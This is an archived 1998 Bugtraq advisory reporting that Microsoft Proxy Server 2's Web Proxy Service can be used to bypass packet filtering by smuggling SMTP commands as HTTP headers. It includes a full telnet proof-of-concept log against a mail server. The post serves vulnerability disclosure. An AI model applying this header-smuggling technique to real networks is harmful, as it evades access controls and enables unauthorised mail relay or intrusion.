Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1998_4

Bugtraq archives for 4th quarter (Oct-Dec) 1998: WARNING: By-passing MS Proxy packet filtering

WARNING: By-passing MS Proxy packet filtering

Mnemonix (mnemonixGLOBALNET.CO.UK)
Wed, 7 Oct 1998 07:10:49 +0100

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Boynton, David, SSgt, AFPOA/DPSM: "Re: Patches for wwwboard.pl (Was: Re: wwwboard.pl vulnerability)"
Previous message: Andrew Daviel: "tooltalk vulnerable on Digital Unix ??"

Whilst playing around with Microsoft's Proxy Server 2, I came across an
interesting "feature" that could allow someone to by-pass packet filtering
if enabled.
The essence of the "exploit" is to connect to a remote host on a given port
- in the example provided I have used the SMTP port (25) - through the Web
Proxy Service.
What you attempt to do is disguise service-specific commands as HTTP
headers. Below is a log of a telnet session where I've telnetted to the Web
Proxy Service, made a GET request and passed off the SMTP commands as HTTP
headers :

------------------------------------------8<--------------------------------
----------
GET http://smtpmail.globalnet.co.uk:25/ HTTP/1.0
mail from: mehere.com
rcpt to: mnemonixglobalnet.co.uk
data :
Subject: This is the Subject Line
:
 This is the body of the message. To get here do a Ctrl+J. To place a
single dot on a line do another Ctrl+J
                                                          .

220 sand2.global.net.uk ESMTP Exim 1.92 #1 Wed, 7 Oct 1998 06:51:37 +0100
500 Command unrecognized
500 Command unrecognized
500 Command unrecognized
250 <mehere.com> is syntactically correct
250 <mnemonixglobalnet.co.uk> is syntactically correct
354 Enter message, ending with "." on a line by itself
250 OK id=0zQmVd-0007md-00
500 Command unrecognized
500 Command unrecognized

------------------------------------------8<--------------------------------
---------

If the packet filter only allows incoming HTTP requests and the Web-Proxy
Service gives Everybody access this could be used to gain entry to the
"protected" network.
This was tested on NT Server 4.0, Service Pack 3 with important hotfixes,
IIS 3.0 and MS Proxy 2.0

l8r
Mnemonix
http://www.diligence.co.uk/
http://www.infowar.co.uk/mnemonix

Next message: Boynton, David, SSgt, AFPOA/DPSM: "Re: Patches for wwwboard.pl (Was: Re: wwwboard.pl vulnerability)"
Previous message: Andrew Daviel: "tooltalk vulnerable on Digital Unix ??"